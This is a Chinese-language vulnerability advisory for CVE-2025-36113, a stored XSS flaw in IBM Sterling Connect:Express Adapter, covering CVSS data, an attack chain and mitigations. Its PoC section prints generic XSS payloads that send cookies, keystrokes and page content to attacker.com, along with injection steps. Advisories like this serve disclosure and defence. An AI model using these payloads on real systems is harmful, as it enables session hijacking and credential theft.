IPBUF安全漏洞报告
English
CVE-2025-36113 CVSS 5.4 中危

CVE-2025-36113: IBM Sterling Connect:Express Adapter XSS漏洞

披露日期: 2026-01-20

漏洞信息

漏洞编号
CVE-2025-36113
漏洞类型
跨站脚本攻击(XSS)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
IBM Sterling Connect:Express Adapter for Sterling B2B Integrator

相关标签

CVE-2025-36113XSS跨站脚本存储型XSSIBM Sterling B2B IntegratorSterling Connect:Express AdapterCWE-79CVSS 5.4中危漏洞身份验证绕过

漏洞概述

CVE-2025-36113是IBM Sterling Connect:Express Adapter for Sterling B2B Integrator中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响5.2.0.00到5.2.0.12版本。攻击者可以利用此漏洞在Web UI中嵌入任意JavaScript代码,从而改变预期功能,可能导致在受信任会话中泄露用户凭据。此漏洞需要攻击者具有低权限用户身份,并且需要用户交互才能触发。由于是存储型XSS,恶意脚本会被永久存储在服务器上,所有访问受影响页面的用户都可能受到攻击。

技术细节

该漏洞是一个存储型跨站脚本(CWE-79)漏洞。攻击者作为经过身份验证的低权限用户,可以在Web UI的某个输入字段中注入恶意JavaScript代码。由于应用程序未对用户输入进行充分的消毒处理,恶意脚本会被存储在服务器端。当其他用户访问包含恶意内容的页面时,浏览器会执行这些脚本,从而实现会话劫持、凭据窃取或钓鱼攻击。攻击向量为网络边界(AV:N),攻击复杂度低(AC:L),需要用户交互(UI:R)。CVSS向量: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N。

攻击链分析

STEP 1
Reconnaissance
攻击者识别目标系统为IBM Sterling B2B Integrator,并确认版本在5.2.0.00-5.2.0.12范围内
STEP 2
Initial Access
攻击者获取目标系统的低权限用户账户(通过社会工程、凭据填充或其他方式)
STEP 3
XSS Injection
攻击者登录Web UI,在存在漏洞的输入字段中注入恶意JavaScript代码(如<script>标签或事件处理器)
STEP 4
Persistence
恶意脚本被永久存储在服务器数据库中,成为存储型XSS
STEP 5
Execution
当其他用户(如管理员)访问包含恶意内容的页面时,浏览器执行注入的JavaScript代码
STEP 6
Impact
攻击者可窃取会话Cookie、凭据或其他敏感信息,甚至可能在受信任会话中执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Stored XSS PoC for CVE-2025-36113 --> <!-- This PoC demonstrates injecting JavaScript into a vulnerable field --> <!-- Example 1: Basic XSS payload --> <script>alert(document.cookie)</script> <!-- Example 2: Session hijacking payload --> <script> fetch('https://attacker.com/steal?cookie=' + document.cookie); </script> <!-- Example 3: Keylogger payload --> <script> document.addEventListener('keypress', function(e) { fetch('https://attacker.com/log?key=' + e.key); }); </script> <!-- Example 4: DOM-based credential harvesting --> <img src=x onerror='fetch("https://attacker.com/collect?data="+btoa(document.body.innerHTML))'> <!-- Steps to exploit: 1. Authenticate to IBM Sterling B2B Integrator as a low-privilege user 2. Navigate to a vulnerable input field in the Web UI 3. Inject one of the above XSS payloads 4. Save/submit the form 5. When other users view the affected page, the payload will execute -->

影响范围

IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.00 through 5.2.0.12

防御指南

临时缓解措施
立即限制低权限用户对Web UI的访问权限,直到完成安全更新。同时启用WAF规则检测和阻止XSS攻击特征。监控日志中的异常JavaScript代码模式。建议受影响用户尽快升级到5.2.0.13或更高版本以消除该漏洞。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表